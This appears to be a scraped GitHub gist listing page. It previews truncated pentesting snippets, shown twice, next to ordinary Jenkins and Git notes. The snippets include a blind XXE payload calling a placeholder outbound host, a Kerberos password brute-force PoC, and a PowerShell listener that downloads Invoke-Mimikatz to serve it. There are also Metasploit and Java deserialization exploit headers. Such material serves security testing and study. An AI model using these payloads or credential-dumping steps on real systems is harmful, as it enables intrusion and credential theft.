Chris Gates carnal0wnage

## jenkins-api.md

      
              1 file
            
          
              32 forks
            
          
              18 comments
            
          
              134 stars
            
          
                justlaputa
                / jenkins-api.md
            
            
              Last active
              September 26, 2023 17:43
            
              
                Jenkins Json API
              
          
    jobs

jenkins_url + /api/json?tree=jobs[name,color]
builds

jenkins_url + /job/${job_name}/api/json?tree=builds[number,status,timestamp,id,result]
last build


## README.md

      
              1 file
            
          
              1315 forks
            
          
              105 comments
            
          
              2893 stars
            
          
                hofmannsven
                / README.md
            
            
              Last active
              April 19, 2024 13:17
            
              
                Git CLI Cheatsheet
              
          
    Git

Global Settings


Related Setup: https://gist.github.com/hofmannsven/6814278
Related Pro Tips: https://ochronus.com/git-tips-from-the-trenches/
Interactive Beginners Tutorial: http://try.github.io/
Git Cheatsheet by GitHub: https://services.github.com/on-demand/downloads/github-git-cheat-sheet/

Reminder

Press minus + shift + s and return to chop/fold long lines!

  
## netgear_upnp_csrf.rb
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpServer::HTML

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'NetGear UPnP CSRF',

## XXE_payloads
--------------------------------------------------------------
Vanilla, used to verify outbound xxe or blind xxe
--------------------------------------------------------------

<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
]>
<r>&sp;</r>

## list_gcp_iprange.sh
#!/bin/bash

# https://cloud.google.com/compute/docs/faq#find_ip_range
# nslookup -q=TXT _cloud-netblocks.googleusercontent.com  8.8.8.8

myarray=()
for LINE in `dig txt _cloud-netblocks.googleusercontent.com +short | tr " " "\n" | grep include | cut -f 2 -d :`
do
	myarray+=($LINE)
	for LINE2 in `dig txt $LINE +short | tr " " "\n" | grep include | cut -f 2 -d :`

## kinit_brute.sh
#!/bin/bash

# Title: kinit_brute.sh
# Author: @ropnop
# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
# The script configures the realm and KDC for you based on the domain provided and the domain controller
# Since this configuration is only temporary though, if you want to actually *use* the TGT you should actually edit /etc/krb5.conf
# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
# Note: this *will* lock out accounts if a domain lockout policy is set. Be careful

## blackhat_arsenal.md

      
              1 file
            
          
              1 fork
            
          
              0 comments
            
          
              1 star
            
          
                godinezj
                / blackhat_arsenal.md
            
            
              Created
              July 27, 2017 18:34
            
          
    Cumulus Toolkit Cliff Notes

By popular demand, here are my notes for running the demo I presented at Blackhat Arsenal 2017. These are not full instructions on how to setup the full environment, please let me know if you are interested in such a thing.
References:

Blackhat Arsenal 2017 presentation: https://www.blackhat.com/us-17/arsenal.html#cumulus-a-cloud-exploitation-toolkit
Cumulus - A Cloud Exploitation Toolkit: https://drive.google.com/file/d/0B2Ka7F_6TetSNFdfbkI1cnJHUTQ
The code, see cumulus branch: https://github.com/godinezj/metasploit-framework
xxe-example, see https://github.com/rgerganov/xxe-example


## server.ps1
$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1")
$Hso = New-Object Net.HttpListener
$Hso.Prefixes.Add("http://+:8080/")
$Hso.Start()
While ($Hso.IsListening) {
    $HC = $Hso.GetContext()
    $HRes = $HC.Response
    $HRes.Headers.Add("Content-Type","text/plain")
    If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
        $Buf = [Text.Encoding]::UTF8.GetBytes($mk)

## deserlab_exploit.py
#!/usr/bin/env python
"""
    DiabloHorn - https://diablohorn.com
    References
        https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
        https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html
        https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html
        http://gursevkalra.blogspot.nl/2016/01/ysoserial-commonscollections1-exploit.html
        https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
        https://www.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478

## ManualPayloadGenerate.java
/*
    DiabloHorn - https://diablohorn.com
    For learning purposes we build the groovy payload ourselves instead of using
    ysoserial. This helps us better understand the chain and the mechanisms
    involved in exploiting this bug.

    compile with:
        javac -cp <path to groovy lib> ManualPayloadGenerate.java
    Example:
        javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar ManualPayloadGenerate.java
	require 'msf/core'

	class Metasploit3 < Msf::Exploit::Remote
	Rank = ExcellentRanking

	include Msf::Exploit::Remote::HttpServer::HTML

	def initialize(info = {})
	super(update_info(info,
	'Name' => 'NetGear UPnP CSRF',
	--------------------------------------------------------------
	Vanilla, used to verify outbound xxe or blind xxe
	--------------------------------------------------------------

	<?xml version="1.0" ?>
	<!DOCTYPE r [
	<!ELEMENT r ANY >
	<!ENTITY sp SYSTEM "http://x.x.x.x:443/test.txt">
	]>
	<r>&sp;</r>
	#!/bin/bash

	# https://cloud.google.com/compute/docs/faq#find_ip_range
	# nslookup -q=TXT _cloud-netblocks.googleusercontent.com 8.8.8.8

	myarray=()
	for LINE in `dig txt _cloud-netblocks.googleusercontent.com +short \| tr " " "\n" \| grep include \| cut -f 2 -d :`
	do
	myarray+=($LINE)
	for LINE2 in `dig txt $LINE +short \| tr " " "\n" \| grep include \| cut -f 2 -d :`
	#!/bin/bash

	# Title: kinit_brute.sh
	# Author: @ropnop
	# Description: This is a PoC for bruteforcing passwords using 'kinit' to try to check out a TGT from a Domain Controller
	# The script configures the realm and KDC for you based on the domain provided and the domain controller
	# Since this configuration is only temporary though, if you want to actually use the TGT you should actually edit /etc/krb5.conf
	# Only tested with Heimdal kerberos (error messages might be different for MIT clients)
	# Note: this will lock out accounts if a domain lockout policy is set. Be careful
	$mk = (new-object net.webclient).downloadstring("https://github.com/PowerShellMafia/PowerSploit/raw/master/Exfiltration/Invoke-Mimikatz.ps1")
	$Hso = New-Object Net.HttpListener
	$Hso.Prefixes.Add("http://+:8080/")
	$Hso.Start()
	While ($Hso.IsListening) {
	$HC = $Hso.GetContext()
	$HRes = $HC.Response
	$HRes.Headers.Add("Content-Type","text/plain")
	If (($HC.Request).RawUrl -eq '/home/news/a/21/article.html') {
	$Buf = [Text.Encoding]::UTF8.GetBytes($mk)
	#!/usr/bin/env python
	"""
	DiabloHorn - https://diablohorn.com
	References
	https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/
	https://deadcode.me/blog/2016/09/02/Blind-Java-Deserialization-Commons-Gadgets.html
	https://deadcode.me/blog/2016/09/18/Blind-Java-Deserialization-Part-II.html
	http://gursevkalra.blogspot.nl/2016/01/ysoserial-commonscollections1-exploit.html
	https://foxglovesecurity.com/2015/11/06/what-do-weblogic-websphere-jboss-jenkins-opennms-and-your-application-have-in-common-this-vulnerability/
	https://www.slideshare.net/codewhitesec/exploiting-deserialization-vulnerabilities-in-java-54707478
	/*
	DiabloHorn - https://diablohorn.com
	For learning purposes we build the groovy payload ourselves instead of using
	ysoserial. This helps us better understand the chain and the mechanisms
	involved in exploiting this bug.

	compile with:
	javac -cp <path to groovy lib> ManualPayloadGenerate.java
	Example:
	javac -cp DeserLab/DeserLab-v1.0/lib/groovy-all-2.3.9.jar ManualPayloadGenerate.java